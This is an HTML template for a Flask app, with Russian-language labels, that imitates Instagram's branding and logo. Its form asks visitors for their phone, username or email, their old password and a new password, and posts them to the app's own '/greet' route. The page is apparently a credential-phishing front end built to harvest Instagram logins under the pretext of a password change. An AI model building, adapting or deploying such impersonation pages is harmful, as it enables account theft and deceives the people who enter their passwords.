<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Instagram Registration</title>
    <!-- Подключение Bootstrap CSS -->
    <link
      href="https://stackpath.bootstrapcdn.com/bootstrap/5.3.0/css/bootstrap.min.css"
      rel="stylesheet"
    />
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css"
    />
    <style>
      .form-container {
        max-width: 600px; /* Максимальная ширина формы */
        margin: 0 auto; /* Центрирование формы */
        padding: 20px; /* Отступы вокруг формы */
        border: 1px solid #ddd; /* Граница формы */
        border-radius: 10px; /* Закругленные углы */
        box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); /* Тень */
      }
      .form-control-lg {
        height: calc(2.5rem + 2px); /* Увеличенная высота полей ввода */
      }

      .form-control-lg {
        width: 120%;
      }
    </style>
  </head>
  <body>
    <div class="container d-flex justify-content-center align-items-center min-vh-100">
      <div class="form-container">
        <!-- Navbar -->
        <nav class="navbar navbar-expand-lg navbar-light bg-light mb-4">
          <a class="navbar-brand" href="#">
            <img
              src="{{ url_for('static', filename='images/insta.png') }}"
              alt="Instagram Logo"
              width="150"
            />
          </a>
        </nav>

        <!-- Main content -->
        <div class="text-center">
          <!-- Greet form -->
          <form method="POST" action="/greet" class="mb-4">
            <div class="mb-3">
              <input
                type="text"
                name="username"
                class="form-control form-control-lg"
                placeholder="Телефон, имя пользователя или эл. адрес"
              />
            </div>
            <div class="mb-3">
              <input
                type="password"
                name="password"
                class="form-control form-control-lg"
                placeholder="Старый пароль"
              />
            </div>
            <div class="mb-3">
              <input
                type="password"
                name="password"
                class="form-control form-control-lg"
                placeholder="Новый пароль"
              />
            </div>
            <button type="submit" class="btn btn-primary">Изменить</button>
          </form>
        </div>
      </div>
    </div>

    <!-- Подключение Bootstrap JS -->
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/5.3.0/js/bootstrap.bundle.min.js"></script>
  </body>
</html>
